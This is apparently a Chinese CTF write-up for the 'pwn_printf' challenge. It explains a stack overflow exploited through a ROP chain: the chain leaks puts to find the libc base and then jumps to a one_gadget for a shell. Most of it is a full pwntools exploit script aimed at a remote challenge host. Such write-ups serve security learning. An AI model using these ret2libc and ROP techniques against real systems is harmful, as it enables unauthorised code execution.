hxb_pwn_printf

Posted on

pwn_printf

思路

程序有一个存在栈溢出的函数vul

  1. 连续输入0x10个30以后,就会进入到vul,此时写入

    1
    payload=b'a'*8+p64(rdi)+p64(pelf.got['puts'])+p64( pelf.plt['puts'])+p64(rdi)+p64(0x200)+p64(vul)

    payload=b’a’*8+p64(rdi)+p64(pelf.got[‘puts’])+p64( pelf.plt[‘puts’])+p64(rdi)+p64(0x200)+p64(vul)

通过rop设置puts的参数,然后用puts泄漏出libc的地址,然后通过rop重新设置vul写入的长度并跳转会vul

  1. 利用libc地址找到一个onegadget,通过栈溢出跳转执行获得shell

    1
    payload = b'a'*8+p64(onegadget)+0x200*b'\x00'

    注意onegadget的条件,rsp+N=NULL,只要一直向后写0就能够满足条件

EXP

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
from pwn import *
from pwnlib.ui import pause

'''
ip: 47.111.104.169
port: 56706
protocol: tcp
'''


context.log_level = 'debug'
context.terminal = ['tmux', 'splitw', "-h"]
# p = process('./pwn_printf')
p = remote('47.111.104.169', 56706)

# cmd = 'b *0x40112E\n'
cmd = 'b *0x401181\n'
cmd += 'b *0x4007C6'


# gdb.attach(p,cmd)
pelf=ELF('./pwn_printf')
lelf = ELF('/lib/x86_64-linux-gnu/libc-2.23.so')
p.recvuntil('You will find this game very interesting\n')
for i in range(0x10):
    p.sendline('30')

rdi = 0x401213
rsi_r15 = 0x401211
vul = 0x4007C6
payload=b'a'*8+p64(rdi)+p64(pelf.got['puts'])+p64(pelf.plt['puts'])+p64(rdi)+p64(0x200)+p64(vul)

p.sendline(payload)
puts=u64(p.recvn(6).ljust(8,b'\x00'))
print('puts',hex(puts))
libc = puts-0x06f6a0
print('libc',hex(libc))

r = libc+0x0f7310
print('read', hex(r))

onegadget = libc+0x4527a
payload = b'a'*8+p64(onegadget)+0x200*b'\x00'
p.sendline(payload)


p.interactive()